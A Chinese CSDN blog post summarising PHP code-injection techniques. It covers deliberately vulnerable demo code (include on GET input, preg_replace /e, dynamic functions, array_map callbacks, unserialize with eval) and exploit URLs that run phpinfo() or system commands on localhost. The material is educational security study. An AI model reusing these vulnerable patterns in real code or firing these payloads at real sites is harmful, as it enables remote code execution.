php执行函数吗_php执行函数总结

最新推荐文章于 2024-08-03 14:13:13 发布
最新推荐文章于 2024-08-03 14:13:13 发布
阅读量137 收藏
点赞数
文章标签: php执行函数吗
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35793067/article/details/115094535
版权
本文详细介绍了PHP中的代码注入漏洞,包括preg_replace()函数的多种利用方式,动态变量和函数执行,以及文件包含和OB_start()等函数的安全隐患。通过实例展示了如何利用这些漏洞执行任意代码,并提醒开发者注意防范措施,确保应用程序的安全性。
摘要由CSDN通过智能技术生成

preg_replace()使用 一 代码执行函数 PHP中可以执行代码的函数。如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec() 等 demo code 1.1: <?php echo `dir`; ?> 二 文件包含代码注射 文件包含函数在特定条件下的代码注射,如include()、include_once()、 require()、require_once()。 当allow_url_include=On ,PHP Version>=5.2.0 时,导致代码注射。 demo code 2.1: <?php include($_GET['a']); ?> 访问http://127.0.0.1/include.php?a=data:text/plain,%3C?php%20phpinfo%28%29;?%3E 即 执行phpinfo()。 三 正则匹配代码注射 众所周知的preg_replace()函数导致的代码注射。当pattern中存在/e模式修饰符,即允许执行代码。这里我们分三种情况讨论下 3.1 preg_replace() pattern 参数注射 pattern即第一个参数的代码注射。 当magic_quotes_gpc=Off时,导致代码执行。 demo code 3.1: <?php echo $regexp = $_GET['reg']; $var = 'phpinfo()'; preg_replace("/(.*?)$regexp", '\\1', $var); ?> 访问http://127.0.0.1/preg_replace1.php?reg=%3C\/php%3E/e 即 执行phpinfo()。 3.2 preg_replace() replacement参数注射 replacement即第二个参数的代码注射,导致代码执行。 demo code 3.2: preg_replace("/test/e",$_GET['h'],"jutst test"); ?> 当我们提交 http://127.0.0.1/preg_replace2.php?h=phpinfo() 即 执行phpinfo()。 3.3 preg_replace()第三个参数注射 我们通过构造subject参数执行代码。提交:http://127.0.0.1/preg_replace3.php?h=[php]phpinfo()[/php] 或者 http://127.0.0.1/preg_replace3.php?h=[php]${phpinfo%28%29}[/php] 导致代码执行 demo code 3.3: preg_replace("/\s*\[php\](.+?)\[\/php\]\s*/ies", "\\1", $_GET['h']); ?> 四 动态代码执行 4.1 动态变量代码执行 demo code 4.1: <?php $dyn_func = $_GET['dyn_func']; $argument = $_GET['argument']; $dyn_func($argument); ?> 我们提交 http://127.0.0.1/dyn_func.php?dyn_func=system&argument=ipconfig 执行ipconfig命令 4.2 动态函数代码执行 demo code 4.2: 

  <?php $foobar = $_GET['foobar'];  $dyn_func = create_function('$foobar', "echo $foobar;");  $dyn_func('');  ?>
我们提交 http://127.0.0.1/create_function.php?foobar=system%28dir%29 执行dir命令 五 其他 5.1 ob_start()函数的代码执行 demo code 5.1: 
  <?php $foobar = 'system';  ob_start($foobar);  echo 'dir';  ob_end_flush();  ?>
5.2 array_map()函数的代码执行 demo code 5.2: 
  <?php $evil_callback = $_GET['callback'];  $some_array = array(0, 1, 2, 3);  $new_array = array_map($evil_callback, $some_array);  ?>
我们提交 http://127.0.0.1/array_map.php?callback=phpinfo 即执行phpinfo()。 5.3 unserialize()与eval() unserialize()是PHP中使用率非常高的函数。不正当使用unserialize()容易导致安全隐患。 (黑哥那个挑战2 http://hi.baidu.com/hi_heige/blog/item/505b2828da5b18f499250a9b.html) demo code 5.3: 
  <?php class Example {  var $var = '';  function __destruct() {  eval($this->var);  }  }  unserialize($_GET['saved_code']);  ?>
我们提交 http://127.0.0.1/unserialize.php?saved_code=O:7:%22Example%22:1:{s:3:%22var%22;s:10:%22phpinfo%28%29;%22;} 即执行phpinfo()。 5.4 容易导致安全问题的函数 同类型函数还有很多 array_map() usort(), uasort(), uksort() array_filter() array_reduce() array_diff_uassoc(), array_diff_ukey() array_udiff(), array_udiff_assoc(), array_udiff_uassoc() array_intersect_assoc(), array_intersect_uassoc() array_uintersect(), array_uintersect_assoc(), array_uintersect_uassoc() array_walk(), array_walk_recursive() xml_set_character_data_handler() xml_set_default_handler() xml_set_element_handler() xml_set_end_namespace_decl_handler() xml_set_external_entity_ref_handler() xml_set_notation_decl_handler() xml_set_processing_instruction_handler() xml_set_start_namespace_decl_handler() xml_set_unparsed_entity_decl_handler() stream_filter_register() set_error_handler() register_shutdown_function() register_tick_function()
内酷少女
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP正则替换函数preg_replace和preg_replace_callback使用总结
12-18
### PHP正则替换函数preg_replace和preg_replace_callback使用总结 #### 一、概述 在进行PHP编程时,尤其是在处理模板引擎或需要对字符串进行高级替换的场景中,`preg_replace()` 和 `preg_replace_callback()` 是...
php外部执行命令函数用法小结
12-19
标题中的“php外部执行命令函数用法小结”是指在PHP编程中,如何利用特定的内置函数来调用操作系统(通常是在Linux环境下)的命令。这些函数允许PHP代码与操作系统进行交互,执行如文件操作、系统管理等任务。在描述...
PHP命令执行函数讲解
test\\的博客
10-18 928
system函数函数语法:system ( string $command [,int $return_var ]) 函数执行command参数所指定的命令,并输出结果。 命令执行后的返回值存在输出值的最后一行,函数本身也会打印全部的输出值。 string和int是参数的数据类型,分别是字符串和整型。 command:要执行的命令。 return_var:如果提供return_var参数,则...
PHP执行函数
cyumengs的专栏
01-12 749
作者:alibaba  首发:t00ls.net , 转载请注明t00ls PHP后门木马对大家来说一点都不陌生吧,但是它的种类您又知多少呢? 本文为您浅析说明一些php后门木马常用的函数PHP后门木马常用的函数大致上可分为四种类型: 1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open 2. 代码执行
php常见代码执行函数和常见系统命令执行函数
最新发布
weixin_67840381的博客
08-03 257
a($b)动态函数。可成功写入一句话木马。实验靶场以及页面源码。
php命令执行函数
l578900的博客
11-04 496
①system() ②exec() ③shell_exec() ④passthru() ⑤popen() ⑥反引号` ` 2、php代码执行函数 ①eval(),必须以分号结尾 ②assert() ③grep_replace() 对字符串进行正则匹配后的替换,当正则部分存在e修饰符,替换内容就会被当成代码执行,因为/e修饰符本身有自动转译的功能 ④call_user_func() 回调函数 ⑤动态函数$a($b) ...
PHP程序执行函数
weixin_30762087的博客
08-06 129
php执行shell命令的函数有一下几个: escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数escapeshellcmd — shell 元字符转义exec — 执行一个外部程序passthru — 执行外部程序并且显示原始输出proc_close — 关闭由 proc_open 打开的进程并且返回进程退出码proc_get_status — 获取由...
PHP错误处理函数register_shutdown_function使用示例
01-20
当程序在线上运行时,如果遇到BUG,想不在前端输出错误信息,同时能及时邮件通知开发者,...register_shutdown_function 函数,当我们的脚本执行完成或意外死掉导致PHP执行即将关闭时,我们的这个函数将会 被调用,
PHP常见的命令执行函数与代码执行函数
dys的博客
06-23 6069
命令执行与代码执行
PHP常见的命令执行函数与代码执行函数_php命令执行函数(1)
m0_60721695的博客
04-06 1071
php?array_filter — 使用回调函数过滤数组的元素php?命令执行:cmd=whoami dys=system使用用户自定义的比较函数对数组排序,并保持索引关联(不为元素分配新的键)。如果成功则返回 TRUE,否则返回 FALSE。php?preg_replace(‘正则规则’,‘替换字符’,‘目标字符’)执行命令和上传文件参考assert函数(不需要加分号)。
Web安全基础-命令执行getshell
HAKUNAMATATATTA的博客
11-23 1431
应用未对用户输入做严格得检查过滤,导致用户输入得参数被当成命令来执行
PHP常见的命令执行函数与代码执行函数_php命令执行函数
m0_60721695的博客
04-06 1267
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。使用用户自定义的比较函数对数组排序,并保持索引关联(不为元素分配新的键)。将用户自定义函数作用到数组中的每个值上,并返回用户自定义函数作用后的带有新值的数组。回调函数接受的参数数目应该和传递给 array_map() 函数的数组数目一致。这里的 assert 是被调用的回调函数,其余为回调函数的参数。将传入的参数作为数组的第一个值传递给assert函数。命令执行:cmd=system(whoami)
PHP中常见的命令执行函数与代码执行函数
→_→
10-22 1万+
参考: https://blog.csdn.net/weixin_43376075/article/details/105189017 https://blog.csdn.net/qq_43168364/article/details/105595532 https://www.cnblogs.com/-qing-/p/10819069.html 代码执行函数: 1- eval() #传入的参数必须为PHP代码,既需要以分号结尾。 #命令執行:cmd=system(whoami); #菜.
PHP命令执行函数
m0_49025459的博客
01-03 919
在做面试题的时候发现,自己对PHP命令执行函数的了解并不是很全面,就想这去学习一下。我也在网上找到了许多的资料,在这里我就相当于一个总结吧。
PHP代码执行函数总结
11-15 869
&#13;   PHP中可以执行代码的函数,常用于编写一句话木马,可能导致代码执行漏洞,这里对代码执行函数做一些归纳。&#13;   常见代码执行函数,如  &#13;     eval()、assert()、preg_replace()、create_function()&#13;     array_map()、call_user_func()、call_user_fun...
PHP文件包含漏洞
Jim的博客
08-17 1314
PHP的文件包含可以直接执行包含文件的代码,包含的文件格式是不受限制的。 文件包含分为本地文本包含(local file include)和远程文件包含(remote file include) 文件包含函数有:include(),include_once(),require()和require_once() 1.本地文件包含是指只能包含本机文件的包含漏洞,大多出现在模块加载,模板加载和ca
PHP执行系统命令函数
热门推荐
Au
03-24 2万+
命令注入 命令注入(Command Injection),对一些函数的参数没有做过滤或过滤不严导致的,可以执行系统或者应用指令(CMD命令或者bash命令)的一种注入攻击手段。 常见的执行系统命令的函数有 system() passthru() exec() shell_exec() popen() proc_open() pcntl_exec() system()...
PHP执行代码
持之以恒
03-25 1378
ignore_user_abort(true); //即使Client断开(如关掉浏览器),PHP脚本也可以继续执行.set_time_limit(0); // 执行时间为无限制,php默认执行时间是30秒,可以让程序无限制的执行下去$interval=5; // 每五秒运行一次do{    sleep($interval);  // 按设置的时间等待循环执行    //循环执行的代码}while...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值